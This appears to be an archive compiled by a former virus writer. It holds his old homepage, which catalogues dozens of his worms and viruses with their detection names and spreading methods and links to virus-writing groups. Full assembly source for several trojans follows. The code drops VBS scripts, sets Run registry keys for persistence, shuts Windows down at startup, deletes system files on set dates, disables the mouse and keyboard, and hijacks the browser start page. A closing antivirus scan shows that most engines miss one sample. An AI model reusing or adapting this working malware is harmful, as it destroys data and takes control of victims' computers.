
PetiK Archiver

1.0
17/05/2009
Seven years after I stopped coding viruses/worms, I decided to assemble all my works.
They are sorted by date like this : YYYYMMDD (where Y is the year, M the month and D the day) and
the name of the work.
At the beginning you can see my old website page. Then my works. Next, my unfinished works and
some articles.

Best reading.
PetiK Homepage
(last update : July 9th 2002)

EMAIL : petikvx@aol.com

NEW : FORUM FOR ALL VXERS : CLICK HERE

PLEASE SIGN MY GUESTBOOK : CLICK HERE

2002:
July 9th :
GOOD BYE TO ALL VXERS. I LEAVE THE VX-SCENE. I HOPE MY WORKS LIKE YOU AND WILL
HELP YOU IN YOUR VX-LIFE.
IF YOU WANT TO CONTACT ME, PLEASE WRITE IN THE GUESTBOOK.
Special Thanx to : alc0paul, Benny/29A, Bumblebee, Vecna, Mandragore, ZeMacroKiller98 and the greatest
coder group : 29A

July 7th : Add some new descriptions of AV (from Trend Micro and McAfee)
July 3rd : Add the binary of my last Worm coded with alc0paul : VB.Brigada.Worm
July 2nd : Add a new link : Second Part To Hell
June 29th : Add my new tool : PetiK’s VBS Hex Convert and add my last full spread VBS worm : VBS.Hatred
June 26th : Add W32/HTML.Dilan
June 24th : Add VBS.Park
June 22nd : I finish my new worm : VB.DocTor.Worm
June 20th : PETIKVX EZINE #2 RELEASED : DOWNLOAD IT and add a new tool : CryptoText and my last worm :
VB.Mars.Worm
June 19th : Add VBS.Cachemire. Add my new article VBS/HTML Multi-Infection.
June 16th : I join a new Virus Group : Brigada Ocho (create by alc0paul)
June 1st : Add VB.Lili.Worm. My new worm is released : I-Worm.Haram
May 31st : I leave the rRlf group
May 23rd : New Ezine : rRlf#2
May 19th : I remove some sources. You can find some of them in PetiKVX#1 and the others in PetiKVX#2. Finished
VB.Visual.Worm, published in PetiKVX #2
May 14th : Add W97M.ApiWord
May 12th : Add W32.HLLW.Archiver
May 10th : Add a new tool to protect against new VBS Worm : PPVBSW
May 9th : Add a new macro virus : W97M.AutoSpread
May 8th : I join the rRlf group (http://www.rrlf.de). Add HTML.Welcome.
May 6th : Add a new article : VBS Tutorial, also available in PDF
April 27th : Add VBS.Xchange
April 21st : Add all the sources of my works.
April 7th : Add my first Ezine : PetiKVX Ezine #1. My new email is Petikvx@aol.com
March 15th : Add I-Worm.Together
March 14th : My new email : petikvx@lycos.fr (petikvx@multimania.com failed)
March 10th : Add W32.HLLW.LiteLo
March 9th : Add my articles in PDF format : articlesPDF and 29A#6.
March 8th : Add my first VBS worm and HTML virus generator : PSWVG (W32.PSVG.gen : Norton AntiVirus,
Constructor.VBS.PSWVG.10 : AVP)
March 3rd : Add a new virus/worm : VBS/W97M.Doublet
February 25th : Add a macro virus : W97M.Wolf
February 24th : Add a lame love worm : HTML.Linda
February 22nd : Add W32.HLLW.Wargames
February 18th : Add a new Ezine : rRlf
February 16th : Add my first virus (perhaps bug) : WinRAR.Linda
February 14th : Add a new HTML virus : HTML.Macrophage
February 10th : My last worm can be downloaded. Add my second article : Technics
February 7th : Finish my last worm : I-Worm.Falken (can’t download immediately)
February 4th : Add new worm : I-Worm.Extract
February 1st : New Worm : W32/W97M.Twin
January 27th : I come back with a new worm : HLLW.SingLung.Worm
January 20th : Add PetiKShow. This program contains all the sources of my works.
January 10th : Add an old article about Worm Spreading written by me on September 19th.
January 1st : HAPPY NEW YEAR. I DECIDED TO STOP TO CODE VIRII AND WORM. GOOD BYE

2001:
December 10th : Add my last worm : W32.HLLW.Last
November 6th : I-Worm.Anthrax
October 12th : I-Worm.WTC
September 8th : I-Worm.Passion
September 2nd : I-Worm.Rush
August 24th : I-Worm.Casper
August 18th : Add the tool tElock 5.1 (A compress/encrypted PE file)
August 16th : I-Worm.Kevlar
August 12th : New design. You can hear one of my compositions.
August 9th : New description from AVP about I-Worm.MadCow and I-Worm.Friends.
August 8th : I-Worm.XFW
July 18th : New family : W32.Pet_Tick family (6), VBS.Pet_Tick family (3) from Norton Antivirus
July 8th : I-Worm.MaLoTeYa
July 3rd : VBS.Delirious
June 30th : I-Worm.Bush
June 19th : I-Worm.Winmine
June 18th : W97M.Blood
June 17th : VBS.Seven
June 10th : VBS.Starmania, I-Worm.Gamma, W97M.Kodak
June 4th : BAT.Quatuor
June 3rd : Bastille, JS.Germinal
June 2nd : Add some Worms : HTML.Embargo, I-Worm.Mustard
May 25th : I start my homepage.
Source
You can find here the different worms that I created (TM = Trend Micro) :

Real Name | Date | AntiVirus Name(s) | Description
Bastille | 06/03/2001 | AVP : IRC.Worm.PetiK ; TM : Bat.PetiK.A | It's a DOS worm. It uses mIRC to spread. On July 14th, it stops the computer.
BAT.Quatuor | 06/04/2001 | IRC.Becky.A | A BAT file which uses mIRC to spread.
CryptoText | 06/20/2002 | - | Coded in VB6. Encrypts ASCII files.
HTML.Bother | 05/13/2001 | HTML.Bother.3180 ; AVP : VBS.Both ; TM : HTML.Bother.A | It is a script that uses ActiveX controls to perform actions. It modifies the default home page. It infects all .HTM and .HTML files that it finds in the \MY DOCUMENTS and \WINDOWS\WEB folders. The default icon for .html files is changed.
HTML.Embargo | 05/29/2001 | VBS.Embaro.A.Intd | It copies itself to \WINDOWS\WinHelp.htm. Changes the AUTOEXEC.BAT. It uses a mIRC channel to spread.
HTML.Linda | 02/24/2002 | - | Lame love worm.
HTML.Macrophage | 02/14/2002 | HTML.Prepend ; Panda : HTML/Mage | Infects htm, html, htt, hta and asp files in different special folders.
HTML.Welcome | 05/08/2002 | VBS.Manu@mm ; TM : VBS.PATIK.G | My first virus for the rRlf group. Infects web files (htm, html, htt, asp) and spreads with Outlook as a VBS file.
I-Worm.Anthrax | 11/06/2001 | W95.Pet_Tick.gen ; TM : Worm.Pettick.A ; Sophos : W32/Petick-A | Opens the default WAB file to take some emails and spreads with MAPI. Spreads with mIRC too.
I-Worm.Bush | 06/30/2001 | W95.Pet_Tick.E@mm ; AVP : I-Worm.PetiK.e | Uses MAPI to spread. No BUGS.
I-Worm.Casper | 08/24/2001 | TM : Worm.Capser.A | It's a utility which detects Happy99 and Icecubes. Uses MAPI. Perhaps bugz.
I-Worm.Dandelion | 11/16/2001 | - | UNRELEASED WORM
I-Worm.Extract | 02/04/2002 | Panda : W32/Extract ; TM : WORM.PETIK.L | Opens KERNEL32.DLL to find APIs.
I-Worm.Falken | 07/02/2002 | - | First WGAA Worm. WARNING !
I-Worm.Friends | 05/05/2001 | W32.Pet_Tick.B ; W32.Fiend.Worm ; AVP : I-Worm.PetiK.b | It uses a VBS file and mIRC to spread. It alters the Windows owner and company.
I-Worm.Gamma | 05/09/2001 | W95.Pet_Tick.D@mm ; W95.Wormfix.Worm@mm ; AVP : I-Worm.PetiK.c | Scans all *.*htm* files in "Temporary Internet Files" and uses MAPI functions to spread.
I-Worm.Haram | 06/01/2002 | - | Spreads with a random VBS file in the StartUp folder and drops an HTML virus.
I-Worm.Kevlar | 08/16/2001 | W32.Pet_tick.M ; TM : Worm.Kevlar.A ; Panda : Worm.PetiK.C | Infects C???????.exe. Scans some email addresses in the Outlook Address Book and uses MAPI to spread.
I-Worm.Loft | 06/23/2001 | W32.Pet_Tick.Intd ; Sophos : W32/Petik-K ; AVP : I-Worm.PetiK.k ; TM : Worm.PetiK.K | Uses MAPI functions to spread. Opens some DLL files to use some APIs.
I-Worm.MadCow | 12/01/2000 | W32.Pet_Tick.A@mm ; W32.Salut.Worm@mm ; AVP : I-Worm.PetiK.a | It's my first worm. It uses Outlook and mIRC to spread. It creates \SYSTEM\MSLS.ICO, which becomes the default icon of .exe files.
I-Worm.MaLoTeYa | 07/08/2001 | W32.Pet_Tick.G ; W32.Malot.Int ; AVP : I-Worm.PetiK.f ; TM : Worm.Malot.A | Uses MAPI to spread. Creates an HTML file in the StartUp folder to send some information about the user. CONTRIBUTION TO 29A#6.
I-Worm.Mustard | 05/27/2001 | W32.Update.Worm ; AVP : I-Worm.PetiK.d ; TM : Worm.Mustard.A | Modifies "Exclude.dat" in the "Install Folder" of Norton Antivirus to create a VBS file. The worm spreads with Outlook, which uses this VBS file.
I-Worm.Passion | 09/08/2001 | W95.Pet_Tick.gen | Copies all the mail addresses of the Outlook Address Book into a file and scans this file to spread. Changes some URLs 1 time out of 10.
I-Worm.PetiK | 02/07/2001 | W95.Pet_Tick.C@mm ; W95.Buggy.Worm@mm ; AVP : I-Worm.IEPatch ; TM : Worm.PetiK.A | Modifies the wallpaper with a BMP file that it downloads from an ftp site. It spreads with a VBS file which uses Outlook.
I-Worm.Rush | 02/09/2001 | TM : Worm.Rush.A | No bugz in the MAPI functions. Start of propagation by error on August 30th. Some payloads with some window titles.
I-Worm.Together | 03/15/2002 | W32.Pet_Tick.AC@mm | Kills some AV. 100% assembler.
I-Worm.Winmine | 06/19/2001 | W32.Mineup.Worm ; AVP : I-Worm.Petik ; McAfee : W32/PetTick@MM ; Panda : W32/PetTick | Uses Outlook to spread.
I-Worm.WTC | 10/11/2001 | Sophos : W32/Petik-WTC ; TM : WORM.PETTICK.Q | A worm against terrorism. Infects RAR files in the Personal directory.
I-Worm.XFW | 08/08/2001 | W95.Pet_tick.gen ; TM : Trojan.PetiK.XFW ; Panda : Worm.PetiK.D | Infects WSOCK32.DLL and all DLL files in the SYSTEM directory.
JS.Germinal | 06/02/2001 | JS.Lamnireg.A Trojan ; AVP : JS.Germinal ; TM : JS.Germinal.A | It infects JS files in the \WINDOWS, \WINDOWS\Desktop and \WINDOWS\SAMPLES\WSH directories. It uses mIRC to spread.
VB.Brigada.Worm | 07/03/2002 | TM : WORM.CRAZYBOX.A | Coded with alc0paul and spreads with Word macros, ZIP and Outlook. My last worm.
VB.DocTor.Worm | 06/22/2002 | W32/W97M.Dotor.Worm ; McAfee : W32/DoTor ; Panda : W32/Dotor.A | It spreads by infecting DOC files.
VB.Lili.Worm | 06/01/2002 | W32.Pet_Ticky.B ; Panda : W32/Petlil.A | A lame worm with a XXX picture.
VB.Mars.Worm | 06/20/2002 | W32.Gubed.Worm ; McAfee : W32/Gubed ; TM : WORM.GUBED.A | This worm spreads by scanning the start page of Internet Explorer to find some emails. The binary is also stored in a VBS file in the %StartUp% folder.
VB.Visual.Worm | 05/19/2002 | W32.Pet_Ticky.gen | My first worm coded in Visual Basic. Lame worm.
VBS.Cachemire | 06/19/2002 | - | A worm which spreads in a local network and has a great spreading power.
VBS.Delirious | 07/03/2001 | VBS.Pet_Tick.C@m ; VBS.Ketip.C@m ; AVP : I-Worm.Petik.h | Puts its code in NORMAL.DOT.
VBS/W97M.Doublet | 03/03/2002 | VBS.Doublet@mm | This virus infects VBS and DOC files. Spreads with Outlook.
VBS/W97M.Xchange | 04/27/2002 | - | This worm/virus infects VBS files and Word DOC documents. CONTRIBUTION TO RRLF#2.
VBS.GoodBye | 12/01/2001 | - | UNRELEASED WORM
VBS.Hatred | 06/29/2002 | - | Encrypted with my tool "PetiK's VBS Hex Convert".
VBS.Judge | 12/08/2000 | VBS.Pet_Tick.B@mm ; VBS.Ketip.B@mm | Uses ftp to download a file (virus ? trojan horse ?). If it is the 1st of the month, Judge modifies the AUTOEXEC.BAT.
VBS.Park | 06/24/2002 | - | A VBS/HTML multi-infection virus.
VBS.PetiK | 01/31/2001 | VBS.Pet_Tick.A@mm ; VBS.Ketip.A@mm ; AVP : I-Worm.LeeBased | It arrives as an HTML email message. It uses the Outlook and mIRC clients to spread. It infects different files and sends some information from the infected computer to 2 email addresses.
VBS.Seven | 06/18/2001 | VBS.Chism@mm ; VBS.Copy.A@mm ; AVP : I-Worm.Petik.i ; TM : VBS.PETIK.I | Many actions on any day.
VBS.Starmania | 06/15/2001 | VBS.ManiaStar.A@mm ; AVP : IRC-Worm.generic.vbs | It infects all VBS files in different folders. It spreads with three different subjects, bodies and attachments.
W32.HLLW.Archiver | 05/12/2002 | - | Infects ZIP files in certain folders.
W32.HLLW.Last | 10/12/2001 | Sophos : W32/Stall-A | My very first (and last) worm written with Borland C++.
W32.HLLW.LiteLo | 03/10/2002 | - | A lame HLL worm.
W32.HLLW.SingLung | 01/27/2002 | AVP : I-Worm.Stopin | Opens *.ht* files to find some emails and spreads with MAPI functions.
W32.HLLW.Wargames | 02/22/2002 | AVP : I-Worm.WarGam ; Viruslist : WarGame ; W32.WarGam.Worm | Different ways of propagation : open *htm files, old mail read and Outlook Address
W32/W97M.Twin | 02/01/2002 | W97M.Comical ; Sophos : W97M.Comical | This worm uses VBA and W32asm to spread.
W32/HTML.Dilan | 06/26/2002 | - | Spreads via HTML files by infecting them in specific folders.
Win32RAR.Linda | 02/16/2002 | - | This virus infects RAR files by adding the virus and HTM files by adding a script.
W97M.ApiWord | 05/14/2002 | W97M.Apish | Uses some APIs to infect Word documents.
W97M.AutoSpread | 05/09/2002 | W97M.Beko@mm | A large spreading. Exports the "Sleep" API.
W97M.Blood | 06/18/2001 | W97M.Pet_Tick.Intd ; W97M.Ketip.Intd | Infects NORMAL.DOT.
W97M.Kodak | 06/10/2001 | AVP : Embedded ; W97M.Adok.A ; AVP : Macro.Word97.Adok | Infects NORMAL.DOT.
W97M.Maya | 06/05/2001 | W97M.OutlookWorm.Gen ; AVP : Macro.Office.Melissa-based ; TM : W97M.AYAM.A | It uses mIRC and Outlook to spread.
W97M.Wolf | 02/25/2002 | W97M.Droopy.A | Infects .doc files with the "Wolf" module. Thanx to Walrus.

Links

A selection of the best virii sites :

VirLinux : http://www.virlinux.fr.fm A French site about Linux virii

VIRUS CODERS :

Alc0paul : http://alcopaul.cjb.net
Belial : http://home.foni.net/~belial
Benny : http://www.coderz.net/benny
Black Jack : http://blackjackvx.cjb.net
Del_Armg0 : http://www.delly.fr.st French coder
FlyShadow : http://flyshadow.cjb.net
Gigabyte : http://www.coderz.net/gigabyte
Immortal Riot : http://www.immortalriot.cjb.net
Kalanar : http://virii.at/ak or http://www.kvirii.com.ar
Lord Julus : http://lordjulus.cjb.net
NBK : http://www.nbk.hpg.ig.com.br
Nucleii : http://www.coderz.net/nucleii/main.html
Pointbat : http://pbat.cjb.net/ French coder
Silvio : http://www.big.net.au/~silvio/
Ratter : http://www.coderz.net/ratter/
SPTH (Second Part To Hell) : http://www.spth.de.vu/
The Walrus : http://walrus.up.to
Tipiax : http://www.multimania.com/tipiax French coder
Vecna : http://www.coderz.net/asm_infamy
VirusBuster : http://vtc.cjb.net
Voven/SMF : http://vovan-smf.wz.cz/
VXUniverse : http://vxuniverse.cjb.net
ZeMacroKiller98 : http://www.crosswinds.net/~zemacrokiller98/index.htm French coder
Zulu : http://www.coderz.net/zulu

VX GROUPS :

29A : http://29a.host.sk
ASM : http://kickme.to/asm
BlackArt : http://blackart.cjb.net
Black Cat virii Group : http://www.ebcvg.com or http://bcvgvx.cjb.net/
Brigada Ocho : http://brigada8.cjb.net
HFX : http://www.hfactorx.org/
Indonesian Virus : http://indovirus.8m.com/
Kryptocrew : http://www.kryptocrew.de
LineZero : http://www.coderz.net/lz0vx/start.htm
MATRiX : http://www.coderz.net/mtxvx
NoMercy : http://www.coderz.net/nomercy/
Pinoy Virus Writer : http://hackers.b3.nu
rRlf : http://www.rrlf.de/
ShadowVX : http://shadowvx.members.easyspace.com/
SMF : http://www.sallyone.com/smf/e_index.htm , http://smfgroup.cjb.net
Ultimate Chaos : http://www.ultimatechaos.co.uk/
Virus Brasil : http://www.virusbrasil.8m.com

OTHER SITES :

Coderz : http://www.coderz.net
Red Virica : http://redvirica.host.sk/
Virii Argentino : http://www.virii.com.ar
Virus Central : http://www.viruscentral.org/
VirusList : http://www.viruslist.com
Virus Trading Center : http://www.oninet.es/usuarios/darknode/
VX-DNET : http://surf.to/vxdnet
VX Heavens : http://vx.netlux.org/
Virus Trading : http://www.virustrading.com/
VX Universe : http://vxuniverse.cjb.net/

ExeTools : http://www.exetools.com
ProTools : http://protools.cjb.net

ANTIVIRUS SITES :

AVP : http://www.avp.ch
Symantec : http://www.symantec.com/avcenter
Trend Micro : http://www.trendmicro.com

CONTACT : GuestBook

© 2001-2002 PetiK. All information on this site is for educational purposes only.
;SIZE : 475 BYTES 31/08/00
;DWARF creates a file dwarf.vbs which adds a key so that
;the computer shuts down at startup
.model small
.code
org 100h

DEBUT : mov ah,09h ;display a message
lea dx,text1 ;with two choices
int 21h

TOUCHE: mov ah,1 ;read a character
int 21h
cmp al,'C'
je CREER_FICHIER
cmp al,'c'
je CREER_FICHIER ;if 'C-c' continue
cmp al,'Q'
je FIN_PROGRAMME
cmp al,'q'
je FIN_PROGRAMME ;if 'Q-q' stop
mov dx,offset bad ;wrong key
mov ah,9h
int 21h
jmp TOUCHE

CREER_FICHIER: mov ah,3Ch ;CREATE A FILE
xor cx,cx
mov dx,offset NOM ;AND GIVE IT A NAME
int 21h
ECRIRE_FICHIER: xchg ax,bx
mov ah,40h ;WRITE TO THE FILE
mov cx,meslen
mov dx,offset note
int 21h
FERMER_FICHIER: mov ah,3Eh ;THEN CLOSE IT
int 21h
mov dx,offset updir ;CHANGE DIRECTORY
mov ah,3Bh
int 21h

MESSAGE: mov ah,09h ;DISPLAY THE MESSAGE
lea dx,msg
int 21h

FIN_PROGRAMME : mov ah,4Ch ;EXIT THE PROGRAM
int 21h

text1 db 10,13,'Tape C pour continuer ou Q pour quitter : $'
bad db 7,7,8,' ',8,24h
NOM db 'c:\dwarf.vbs',0
updir db '..',0
msg db 7,7,7,10,13,'SALUT MEC !!!!'
db 10,10,13,'UN FICHIER A ETE RAJOUTE'
db 10,13,'IL SE NOMME C:\dwarf.vbs $'
note db 'rem DwArF.vbs by Panda '
db '(c) 2000'
prog db 'Dim WSHShell',0Dh,0Ah
db 'Set WSHShell = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'WSHShell.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\'
db 'Windows\CurrentVersion\Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
db 'C:\Windows\system\User.exe,ExitWindows"'

meslen equ $-note

end DEBUT
;By M.Xxxxxxx XXXXXXX (c)2000 09/09/00
;SIZE : 689 BYTES
;FIRST TESTED AT THE LYCEE KIRSCHLEGER IN MUNSTER
;DWARF259 CREATES TWO PROGRAMS :
; -Dwarf.vbs in C: activates Evil.com at each startup
; -Evil.com in C:\WINDOWS.
;On September 25th, it renames REGEDIT.EXE into the recycle bin
;as DWARF.AZE and deletes AUTOEXEC.BAT and WIN.INI

.model small
.code
org 100h

TOUT_DEBUT: jmp FILE1

VERIFICATION: mov ah,2Ah
int 21h
cmp dh,9
jnz FIN_VIRUS
cmp dl,25 ;SEPTEMBER 25TH ?
jnz FIN_VIRUS ;NO : END OF THE TROJAN
AFFICHE: mov ah,9
lea dx,MSG
int 21h
DISQUE: mov ah,41h
mov dx,offset AUTOEXEC
int 21h ;DELETE AUTOEXEC.BAT
mov dx,offset WININI
int 21h ;DELETE WIN.INI
mov ah,56h
mov dx,offset REG ;RENAME REGEDIT.EXE
mov di,offset CORBEILLE ;TO DWARF.AZE
int 21h
FIN_VIRUS: mov ah,4Ch
int 21h

MSG db 7,7,7,'TROJAN.DWARF par PandaKiller (c)2000'
db 10,10,13,'BOOM! BOOM! BOOM! BOOM! BOOM! BOOM!'
db 10,13,' ███ █ █ ██ ███ ████'
db 10,13,' █ █ █ █ █ █ █ █ █ '
db 10,13,' █ █ █ █ ████ ███ ███ '
db 10,13,' █ █ █ █ █ █ █ █ █ █ '
db 10,13,' ███ █ █ █ █ █ █ █ $'

WININI db 'C:\WINDOWS\Win.ini',0
AUTOEXEC db 'C:\autoexec.bat',0
REG db 'C:\WINDOWS\Regedit.exe',0
CORBEILLE db 'C:\RECYCLED\dwarf.aze',0
progl2 equ $-VERIFICATION

FILE1: mov ah,3Ch
xor cx,cx
mov dx,offset NOM1
int 21h ;CREATE THE 1ST FILE
xchg ax,bx
mov ah,40h
mov cx,progl1 ;PROGRAM LENGTH
mov dx,offset prog1 ;PROGRAM START
int 21h ;WRITE
mov ah,3Eh
int 21h ;CLOSE
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;CREATE THE 2ND FILE
xchg ax,bx
mov ah,40h
mov cx,progl2 ;PROGRAM LENGTH
lea dx,VERIFICATION ;PROGRAM START
int 21h ;WRITE
mov ah,3Eh
int 21h ;CLOSE
FIN: mov ah,4Ch
int 21h

NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Evil.com',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "C''EST PARTI",vbcritical',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Evil.com"'
progl1 equ $-prog1
end TOUT_DEBUT
;By M.Xxxxxxx XXXXXXX (c)2000 12/09/00
;SIZE : 1282 BYTES
;DWARF7 CREATES TWO PROGRAMS : Dwarf.vbs and Panda.vbs. DWARF.VBS
;ADDS A KEY TO ACTIVATE PANDA.VBS EVERY DAY. PANDA.VBS
;ONLY ACTS ON DECEMBER 5TH. IT ADDS A KEY TO SHUT DOWN
;THE COMPUTER AT STARTUP AND CREATES AN AUTOEXE.BAT FILE WHICH
;WILL DELETE FILES ON THE COMPUTER.
.model small
.code
org 100h
FILE1: mov ah,3Ch
xor cx,cx
mov dx,offset NOM1
int 21h ;create the 1st file
xchg ax,bx
mov ah,40h
mov cx,progl1
mov dx,offset prog1
int 21h ;write
mov ah,3Eh
int 21h ;close
FILE2: mov ah,3Ch
xor cx,cx
mov dx,offset NOM2
int 21h ;create the 2nd file
xchg ax,bx
mov ah,40h
mov cx,progl2
mov dx,offset prog2
int 21h ;write
mov ah,3Eh
int 21h ;close
MESSAGE: mov ax,3
int 10h
mov ah,9
lea dx,msg
int 21h
FIN: mov ah,4Ch
int 21h

NOM1 db 'c:\Dwarf.vbs',0
NOM2 db 'c:\WINDOWS\Panda.vbs',0
prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah
db 'msgbox "BONNO JOURNEE ?",vbexclamation',0Dh,0Ah
db 'Dim W',0Dh,0Ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows'
db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\Panda.vbs"'
progl1 equ $-prog1
prog2 db 'If Day(Now) = 5 And Month(Now) = 12 Then',0Dh,0Ah
db 'msgbox "ERREUR : CLIQUEZ SUR OK",vbcritical',0DH,0Ah
db 'Dim W',0DH,0Ah
db 'Set W=CreateObject("WScript.Shell")',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF", "C:\WINDOWS\RUNDLL32.EXE '
db '%windir%\system\user.exe,Exitwindows"',0DH,0Ah
db 'W.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\'
db 'Run\DwArF2", "C:\autoexe.bat"',0DH,0Ah
db 'Set X=CreateObject("Scripting.FileSystemObject")',0DH,0Ah
db 'file="C:\autoexe.bat"',0DH,0Ah
db 'Set O=X.CreateTextFile(file, True, False)',0DH,0Ah
db 'O.Writeline "@echo off"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.ini"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.bmp"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\*.sys"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\E*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\M*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\COMMAND\*.*"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.dll"',0DH,0Ah
db 'O.Writeline "del C:\WINDOWS\SYSTEM\*.ini"',0DH,0Ah
db 'msgbox "TU VAS MOURIR DEMAIN",vbinformation',0DH,0Ah
db 'End If',0DH,0Ah
progl2 equ $-prog2
msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh
db 'IL SE NOMME C:\Dwarf.vbs',10,10,13
db 'OUVRE LE VITE $'
end FILE1
;Panda3.asm by PandaKiller 03/10/00
;TASM32 /M /ML panda3
;TLINK32 -Tpe -x -aa panda3,,,import32

.386
locals
jumps
.model flat
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn CloseHandle:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn MessageBoxA:PROC
extrn WinExec:PROC
extrn ExitProcess:PROC

.data
octets dd ?
flz_handle dd ?
nom_fichier db 'C:\Salut.vbs',00h
prog db 'C:\Salut.vbs',00h
TEXTE db 'Salut ! Ca va ?',00h
TITRE db 'Hello',00h
TEXTE2 db 'J''ai mis un fichier sur ton ordinateur',0dh,0ah
db 'Il s''appelle Salut.vbs et se trouve dans C:\',0dh,0ah
db 'Ouvre-le vite',00h
TITRE2 db 'FICHIER CREE',00h
CLE db '\Software\Microsoft\Windows\CurrentVersion',00h
DONNEE db 'PandaKiller',00h
NOM db 'RegisteredOwner',00h
p dd 0
l dd 0

DEBUTV:
db '''VBS/PandaKiller.Trojan.A PAR Pentasm99 (c)2000 03/10/00',0dh,0ah
db '''SE COPIE DANS WINDOWS ET WINDOWS\SYSTEM',0dh,0ah
db '',0dh,0ah
db 'DEBUT()',0dh,0ah
db 'Sub DEBUT()',0dh,0ah
db 'Set a = CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set win = a.GetSpecialFolder(0)',0dh,0ah
db 'Set sys = a.GetSpecialFolder(1)',0dh,0ah
db 'Set c = a.GetFile(WScript.ScriptFullName)',0dh,0ah
db 'c.Copy(win&"\WSock32.dll.vbs")',0dh,0ah
db 'c.Copy(sys&"\PandaDwarf.txt.vbs")',0dh,0ah
db 'INTERNET()',0dh,0ah
db 'BUG2001()',0dh,0ah
db 'Set T = a.deletefile("C:\Salut.vbs")',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''MODIFIE LA PAGE INTERNET ET RAJOUTE UN RESISTRE DANS "RUN"',0dh,0ah
db 'Sub INTERNET()',0dh,0ah
db 'Dim W',0dh,0ah
db 'Set W = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db 'W.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\'
db 'Start Page", "http://www.penthouse.com"',0dh,0ah
db 'W.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'StartWindoz", "C:\WINDOWS\SYSTEM\WSock32.dll.vbs"',0dh,0ah
db 'End Sub',0dh,0ah
db '',0dh,0ah
db '''DESACTIVE LA SOURIS ET LE CLAVIER EN 2001 ET EXECUTE WINMINE',0dh,0ah
db 'Sub BUG2001()',0dh,0ah
db 'If Year(Now) = 2001 Then',0dh,0ah
db ' Dim P',0dh,0ah
db ' Set P = Wscript.CreateObject("WScript.Shell")',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop1", "rundll32,mouse disable"',0dh,0ah
db ' P.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\'
db 'Stop2", "rundll32,keyboard disable"',0dh,0ah
db ' P.run ("C:\WINDOWS\Winmine.exe")',0dh,0ah
db 'End If',0dh,0ah
db 'End Sub',0dh,0ah
taille equ $-DEBUTV
.code
REGISTRE: push offset l
push offset p
push 0
push 1F0000h + 1 + 2h
push 0
push 0
push 0
push offset CLE
push 80000002h ;HKEY_LOCAL_MACHINE
call RegCreateKeyExA
push 05h
push offset DONNEE ;PandaKiller
push 01h
push 0
push offset NOM ;IN RegisteredOwner
push p
call RegSetValueExA ;CREATE A REGISTRY VALUE
push 0
call RegCloseKey ;CLOSE THE REGISTRY KEY
FICHIER: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset nom_fichier ;GIVE THE FILE NAME
call CreateFileA
mov [flz_handle],eax
push 00000000h
push offset octets
push offset taille
push offset DEBUTV
push [flz_handle]
call WriteFile
push [flz_handle]
call CloseHandle
MESSAGE: push 40h
push offset TITRE
push offset TEXTE
push 0
call MessageBoxA
push 40h
push offset TITRE2
push offset TEXTE2
push 0
call MessageBoxA
push 1
push offset prog
call WinExec
FIN: push 0
call ExitProcess
end REGISTRE
File Panda3.exe received on 05.16.2009 18:00:23 (CET)

Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 -
AhnLab-V3 5.0.0.2 2009.05.16 -
AntiVir 7.9.0.168 2009.05.15 -
Antiy-AVL 2.0.3.1 2009.05.15 -
Authentium 5.1.2.4 2009.05.16 -
Avast 4.8.1335.0 2009.05.15 -
AVG 8.5.0.336 2009.05.15 -
BitDefender 7.2 2009.05.16 Generic.Malware.Ssp!.1E162891
CAT-QuickHeal 10.00 2009.05.15 -
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 -
eSafe 7.0.17.0 2009.05.14 -
eTrust-Vet 31.6.6508 2009.05.16 -
F-Prot 4.4.4.56 2009.05.16 -
F-Secure 8.0.14470.0 2009.05.15 -
Fortinet 3.117.0.0 2009.05.16 -
GData 19 2009.05.16 Generic.Malware.Ssp!.1E162891
Ikarus T3.1.1.49.0 2009.05.16 -
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Type_Script
McAfee 5616 2009.05.15 -
McAfee+Artemis 5616 2009.05.15 -
McAfee-GW-Edition 6.7.6 2009.05.15 -
Microsoft 1.4602 2009.05.16 -
NOD32 4080 2009.05.15 -
Norman 6.01.05 2009.05.16 -
